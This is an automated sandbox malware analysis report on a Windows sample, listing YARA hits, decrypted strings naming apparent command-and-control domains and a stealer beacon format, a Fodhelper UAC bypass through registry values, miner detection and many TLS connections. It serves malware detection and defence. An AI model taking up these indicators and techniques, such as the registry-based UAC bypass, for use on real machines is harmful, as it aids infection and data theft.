Windows Analysis Report
xqz8sQ4mZB.exe

Machine Learning detection for dropped file

Source: Yara match	File source: 29.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.2f70e67.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.2220222962.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4256567957.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4252280793.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2228451591.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2142137549.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2173646781.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\ProgramData\Drivers\csrss.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: xqz8sQ4mZB.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: politefrightenpowoa.pw
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: opposesicknessopw.pw
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cakecoldsplurgrewe.pw
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: reviveincapablewew.pw
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ratefacilityframw.fun
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: neighborhoodfeelsa.fun
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: dayfarrichjwclik.fun
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: tablesockartfinewa.pw
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2087944022.00000000044FD000.00000004.00000800.00020000.00000000.sdmp	String decryptor: MyRnHu--Install

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0DD20 CryptReleaseContext,	13_2_6CA0DD20
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0DEE0 CryptReleaseContext,	13_2_6CA0DEE0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0DE00 CryptGenRandom,__CxxThrowException@8,	13_2_6CA0DE00
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0D9D0 CryptAcquireContextA,GetLastError,	13_2_6CA0D9D0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	13_2_6CA0DBB0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA335E0 CryptReleaseContext,	13_2_6CA335E0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0D7F0 CryptReleaseContext,	13_2_6CA0D7F0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA0D7D6 CryptReleaseContext,	13_2_6CA0D7D6

Source: CA65.exe, 00000007.00000003.2948565733.0000000003F79000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_6cccae6c-d

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\4E3.exe"

Bitcoin Miner

Detected unpacking (overwrites its own PE header)

Source: Yara match	File source: 29.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.2f70e67.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.4E3.exe.3860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.4E3.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.4E3.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.2220222962.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4256567957.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4252280793.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2228451591.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2142137549.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2173646781.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Compliance

Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 29.2.4E3.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 37.2.4E3.exe.400000.2.unpack

Source: xqz8sQ4mZB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Snort IDS alert for network traffic

Source: unknown	HTTPS traffic detected: 172.67.215.49:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.185.93:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.191.95:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.250.2.254:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.215.61.44:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:52270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.183.254:443 -> 192.168.2.4:54421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.4:53819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.69.169:443 -> 192.168.2.4:53844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:53818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.201.182.85:443 -> 192.168.2.4:52263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:54327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:54760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:54964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.124.249.58:443 -> 192.168.2.4:54257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:54973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:53889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:54266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.229.226.96:443 -> 192.168.2.4:53891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.126.94.219:443 -> 192.168.2.4:53795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.186.33.19:443 -> 192.168.2.4:53817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:54460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:54972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:54945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.59.243.225:443 -> 192.168.2.4:54937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.4:54377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.252.151.25:443 -> 192.168.2.4:55030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.168.67.138:443 -> 192.168.2.4:54974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:55006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:53892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:54468 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:54417 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:54967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:55265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:55016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.98.192.36:443 -> 192.168.2.4:55194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:55014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:54464 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 66.254.66.55:443 -> 192.168.2.4:54453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.90.51.60:443 -> 192.168.2.4:54303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 68.178.145.3:443 -> 192.168.2.4:53815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.42.111.169:443 -> 192.168.2.4:54888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.108.50:443 -> 192.168.2.4:55133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.182.195.165:443 -> 192.168.2.4:54418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 156.38.230.76:443 -> 192.168.2.4:55032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 218.213.216.3:443 -> 192.168.2.4:56098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 183.111.174.109:443 -> 192.168.2.4:55653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:56253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:57068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:57064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:57066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:57067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:57071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57556 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57619 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:57073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.91.197.26:443 -> 192.168.2.4:55034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:57550 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:57682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:57746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:57732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.108.50:443 -> 192.168.2.4:57715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:57611 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:58322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:58504 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:58454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:58542 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:58593 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:57990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:58594 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:58592 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:58602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:58606 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:58451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:58597 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:58545 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:59247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:59587 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:59458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:59638 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:59473 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:59700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:59596 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:60409 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:60698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:60700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:60922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:60914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:61009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:60936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:60965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:60951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:61318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:61507 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:61509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:61528 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:61505 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:61499 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:61857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:61800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:61664 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:61878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:61918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:61877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:62110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:62037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:61967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:62155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:62164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:62148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:62150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:62161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:62595 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:62796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:62892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:62637 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:62967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:63036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:63036 -> 167.235.0.29:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:63352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:63368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:63772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:63774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:63844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:63776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:63837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:63794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:63842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:63816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:64102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:64146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:64134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:64191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:64295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:64331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:64649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:64659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:64658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:64795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:64801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:64814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:64930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:64798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:64810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:64944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:64805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:64817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:64809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:64829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:65205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:64958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:65173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:65466 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:65522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:65457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:65243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:49210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:49287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:49286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:49450 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:49433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:50294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:50280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:50433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:50393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:50340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:50394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:50733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:50392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:50897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:50980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:50991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:51023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:50285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:51086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:51091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:51050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:51277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:51042 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:51724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:51467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:51519 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:51566 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:51828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:51525 version: TLS 1.2
